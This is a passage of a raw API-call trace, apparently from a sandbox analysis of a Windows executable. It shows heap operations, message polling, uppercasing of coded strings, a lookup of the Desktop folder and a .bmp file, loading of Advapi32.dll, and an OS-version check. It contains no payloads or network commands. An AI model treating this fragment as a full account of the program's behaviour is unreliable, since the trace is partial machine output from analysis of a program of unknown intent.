HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0163.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0163.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0163.725] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0163.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0163.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0163.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0163.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0163.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0163.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0163.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0163.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0163.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0163.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0163.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0163.725] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0163.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0163.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0163.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0163.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0163.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0163.725] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0163.725] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.726] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0163.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0163.726] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0163.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0163.726] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0163.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0163.726] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0163.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0163.726] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/DrmlVcs.bmp", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd27d0d0, ftCreationTime.dwHighDateTime=0x1d4cbfb, ftLastAccessTime.dwLowDateTime=0x5c25220, ftLastAccessTime.dwHighDateTime=0x1d4d04c, ftLastWriteTime.dwLowDateTime=0x5c25220, ftLastWriteTime.dwHighDateTime=0x1d4d04c, nFileSizeHigh=0x0, nFileSizeLow=0x159aa, dwReserved0=0xc170006, dwReserved1=0xdc78, cFileName="DrmlVcs.bmp", cAlternateFileName="")) returned 0xaa5660 [0163.726] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0163.726] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0163.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0163.726] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0163.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0163.727] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0163.727] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0163.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0163.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0163.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0163.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0163.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0163.727] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0163.727] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.727] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0163.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0163.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0163.727] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0163.727] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0163.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0163.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0163.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0163.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0163.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0163.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0163.727] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0163.727] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0163.727] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0163.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0163.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0163.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0163.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0163.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0163.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0163.728] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0163.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0163.728] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0163.728] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0163.728] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0163.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0163.728] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0163.728] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0163.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0163.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0163.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0163.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0163.729] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0163.729] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.729] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0163.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0163.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0163.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0163.729] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.729] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0163.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0163.729] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0163.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0163.732] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0163.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0163.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0163.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0163.732] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0163.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0163.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0163.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa730 [0163.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0163.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0163.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa9b0 [0163.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0163.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0163.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0163.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0163.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0163.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0163.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0163.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0163.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0163.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0163.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0163.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0163.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0163.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0163.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0163.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0163.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0163.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0163.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0163.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0163.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0163.734] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0163.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0163.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0163.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0163.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0163.734] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0163.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0163.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0163.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0163.734] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0163.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0163.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0163.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0163.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0163.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0163.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0163.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0163.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0163.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0163.735] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0163.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0163.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0163.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0163.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0163.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0163.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0163.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0163.735] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0163.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0163.735] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0163.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0163.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0163.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0163.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0163.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0163.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0163.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0163.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0163.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0163.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0163.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0163.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0163.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0163.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0163.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0163.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0163.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0163.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0163.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0163.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0163.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0163.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0163.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0163.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0163.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0163.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0163.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0163.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0163.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0163.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0163.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0163.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.737] 